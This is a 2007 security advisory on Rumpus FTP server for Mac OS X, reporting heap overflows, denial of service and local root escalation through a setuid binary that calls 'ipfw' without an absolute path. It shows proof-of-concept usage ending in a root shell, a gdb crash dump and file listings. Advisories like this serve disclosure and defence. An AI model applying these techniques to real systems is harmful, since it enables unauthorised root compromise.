The following description is provided by the vendor (Maxum Development Corporation):
If you need to allow people from within your office or across the Internet to send, receive, and manage files on a central Mac, Rumpus FTP is what you are looking for. Rumpus is perfect for print, media or design shops, and is the answer to education and corporate file sharing needs. Rumpus FTP can handle virtually any Internet file transfer task by working with standard FTP and Web clients on any platform, and do it with remarkable ease.
rumpusd is vulnerable to different remotely exploitable heap-based
buffer overflows, denial of service conditions and local privilege escalation issues.
Due to the fact that Rumpus works under root privileges, successful exploitation by
unprivileged users would allow a full compromise of the system.
Most of these issues are related to both FTP and HTTP request parsing, as well as insecure use of the
system() function and incorrect permissions and/or handling of setuid binaries.
Rumpus 5.1 and previous versions on Mac OS X 10.4.8 (8L2127). Tested on both PowerPC and x86 based OS X.
Proof of concept, exploit or instructions to reproduce
The provided proof of concept can abuse one of the local privilege escalation issues and another (post-authentication) problem in the handling of the FTP LIST command.
$ ruby MOAB-18-01-2007.rb [selected issue] example: $ ruby bug-files/MOAB-18-01-2007.rb 1 ++ Local privilege escalation... ++ Enjoy root shell... sh-2.05b# id uid=0(root) gid=0(wheel) groups=0(wheel), 81(appserveradm), 79(appserverusr), 80(admin)
Note: The local privilege escalation exploit doesn't replace any files on the filesystem.
The following debugging information shows the results of launching the proof of concept against the FTP service, and the permissions and other information related to Rumpus binaries.
Program received signal EXC_BAD_ACCESS, Could not access memory. Reason: KERN_INVALID_ADDRESS at address: 0x33616263 [Switching to process 989 thread 0x3703] 0x00009fa5 in ?? () (gdb) i r eax 0x0 0 ecx 0x0 0 edx 0x33616263 862020195 ebx 0x100007f 16777343 esp 0xb060aa50 0xb060aa50 ebp 0xb060aa78 0xb060aa78 esi 0x0 0 edi 0x0 0 eip 0x9fa5 0x9fa5 eflags 0x10297 66199 cs 0x17 23 ss 0x1f 31 ds 0x1f 31 es 0x1f 31 fs 0x0 0 gs 0x37 55 (gdb) x/i $eip 0x9fa5: mov (%edx,%eax,4),%eax (gdb) x/10x $ebp 0xb0c16a78: 0xb0c16eb8 0x0000f68f 0x33616263 0x72646972 0xb0c16a88: 0xb0c16ef8 0xb0c16ea4 0x00000000 0x00000000 0xb0c16a98: 0x00000000 0x00000000 (gdb) i f Stack level 0, frame at 0xb0c16a54: eip = 0x9fa5; saved eip 0x0 called by frame at 0x9f9e Arglist at 0xb0c16a4c, args: Locals at 0xb0c16a4c, Previous frame's sp is 0xb0c16a54 Saved registers: ebp at 0xb0c16a4c, eip at 0xb0c16a50 $ ls -l /usr/local/Rumpus/ total 1912 drwxr-xr-x 7 root wheel 238 Jan 19 08:35 Logs -rw-r--r-- 1 root wheel 790 Jan 19 00:38 Mac2Web.txt -rw-r--r-- 1 root wheel 2144 Jan 17 14:51 Messages.txt -rw-rw-rw- 1 root wheel 3128 Jan 19 07:43 Rumpus.conf -rw-rw-rw- 1 root wheel 0 Jan 19 00:38 Rumpus.fsets -rw-rw-rw- 1 root wheel 0 Jan 19 00:38 Rumpus.notices -rw-r--r-- 1 root wheel 3 Jan 19 08:50 Rumpus.pid -rw-rw-rw- 1 root wheel 0 Jan 19 00:38 Rumpus.rips -rw-r--r-- 1 root wheel 8112 Jan 19 00:38 Rumpus.strings -rw-rw-rw- 1 root wheel 1456 Jan 19 00:38 Rumpus.types -rw-rw-rw- 1 root wheel 200 Jan 19 07:45 Rumpus.users -rw-r--r-- 1 root wheel 31 Jan 19 08:36 Rumpus.userstats drwxrwxrwx 46 root wheel 1564 Jan 19 00:38 WFMTemplates -rw-r--r-- 1 root wheel 939 Jan 19 00:38 Web2Mac.txt -rwsr-sr-x 1 root wheel 934244 Jan 19 00:38 rumpusd $ strings /usr/local/Rumpus/rumpusd | grep ipfw ipfw list > /usr/local/Rumpus/Rumpus.ipfw /usr/local/Rumpus/Rumpus.ipfw ipfw list > /usr/local/Rumpus/Rumpus.ipfw /usr/local/Rumpus/Rumpus.ipfw
rumpusd makes the (old, yet still common) mistake of using the
without absolute paths.
Rumpus local privilege escalation issues don't need admin group privileges for exploitation. FTP service flaws, mostly heap buffer overflows, require authentication first (ex. anonymous access). HTTP service flaws can be abused without any type of authentication.
Workaround or temporary solution
For preventing exploitation of the remote issues, properly limit access to the Rumpus services from
untrusted hosts, until a patch is made available by the vendor. There's no workaround for some of the
local privilege escalation issues, due to the fact that they rely on mis-use of the
function and not just 'insecure' permissions (although patching the binary is feasible).
Use an alternative file sharing method.